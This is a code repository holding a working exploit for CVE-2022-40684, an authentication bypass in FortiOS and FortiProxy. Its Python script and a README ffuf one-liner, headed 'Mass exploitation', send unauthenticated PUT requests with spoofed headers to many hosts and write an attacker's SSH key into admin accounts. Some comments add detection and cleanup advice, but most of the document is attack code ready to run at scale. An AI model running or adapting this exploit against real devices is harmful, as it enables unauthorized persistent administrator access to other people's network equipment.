├── CVE-2022-40684.py ├── LICENSE └── README.md /CVE-2022-40684.py: --------------------------------------------------------------------------------
# Proof-of-concept for CVE-2022-40684 (FortiOS / FortiProxy authentication
# bypass, per the README): for every target and every username, the script
# sends an unauthenticated PUT to the admin-user REST endpoint and writes an
# SSH public key into that admin's ssh-public-key1 setting.
1 | import requests
2 | import argparse
3 |
4 | # Read the input arguments
# -t: file of base URLs, one per line; -u: file of admin usernames, one per
# line; --key: the public key to plant. None of the three has a default.
5 | parser = argparse.ArgumentParser()
6 | parser.add_argument("-t", "--targets", help="Targets file")
7 | parser.add_argument("-u", "--usernames", help="Usernames file")
8 | parser.add_argument("--key", help="id_rsa.pub file")
9 | args = parser.parse_args()
10 |
11 | # Read targets
12 | with open(args.targets, "r") as f:
13 |     targets = f.read().splitlines()
14 |
15 | # Read usernames
16 | with open(args.usernames, "r") as f:
17 |     usernames = f.read().splitlines()
18 |
19 | # Read id_rsa.pub
20 | with open(args.key, "r") as f:
21 |     ssh_public_key = f.read()
22 |
23 | # Prepare headers
# Detection note: the bypass request carries a fixed, unusual fingerprint —
# User-Agent 'Report Runner' plus a Forwarded header naming loopback
# addresses — on a request to /api/v2/cmdb/. Management-interface access
# logs or a WAF in front of it can alert on this combination.
24 | headers = {
25 |     'User-Agent': 'Report Runner',
26 |     'Content-Type': 'application/json',
27 |     'Forwarded': 'for="[127.0.0.1]:8000";by="[127.0.0.1]:9000";'
28 | }
29 |
30 | # Prepare data
# Impact / mitigation note: the body overwrites the target admin's
# ssh-public-key1 setting. On a device that was exposed while vulnerable,
# review each admin user's configured SSH keys and remove any that were not
# provisioned by your own team, in addition to patching.
31 | data = {
32 |     "ssh-public-key1": ssh_public_key
33 | }
34 |
# Each target's base URL (scheme and host as given in the targets file) is
# joined with the fixed REST path and the username; nothing is authenticated
# — the request relies solely on the headers above.
35 | for target in targets:
36 |     for username in usernames:
37 |         url = f"{target}/api/v2/cmdb/system/admin/{username}"
38 |         response = requests.put(url, headers=headers, json=data)
# Success is inferred only from the response: HTTP 200 and the literal
# string 'SSH' somewhere in the body. Anything else is reported as a failure,
# including transport errors that raise before this line is reached.
39 |         if response.status_code == 200 and 'SSH' in response.text:
40 |             print(f"[+] Successful exploit for {username} at {url}")
41 |         else:
42 |             print(f"[-] Failed exploit for {username} at {url}")
43 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 kljunowsky 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, 
and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2022-40684-POC 2 | FortiProxy / FortiOS Authentication bypass 3 | 4 | ## Mass exploitation 5 | 6 | ```/api/v2/cmdb/system/admin/``` 7 | 8 | 9 | ```{"ssh-public-key1": ""}``` 10 | 11 | ``` 12 | ffuf -c -w hosts.txt -u FUZZ/api/v2/cmdb/system/admin/admin -X PUT -H 'User-Agent: Report Runner' -H 'Content-Type: application/json' -H 'Forwarded: for="[127.0.0.1 13 | ]:8000";by=”[127.0.0.1]:9000";' -d '{"ssh-public-key1": "kljunowsky"}' -mr "SSH" -r 14 | ``` 15 | 16 | Happy hunting! 17 | 18 | ### Requirements 19 | [ffuf](https://github.com/ffuf/ffuf) 20 | Thanks [@joohoi](https://github.com/joohoi)! 21 | 22 | [Twitter](https://twitter.com/milanshiftsec) 23 | 24 | [LinkedIn](https://www.linkedin.com/in/milan-jovic-sec/) 25 | --------------------------------------------------------------------------------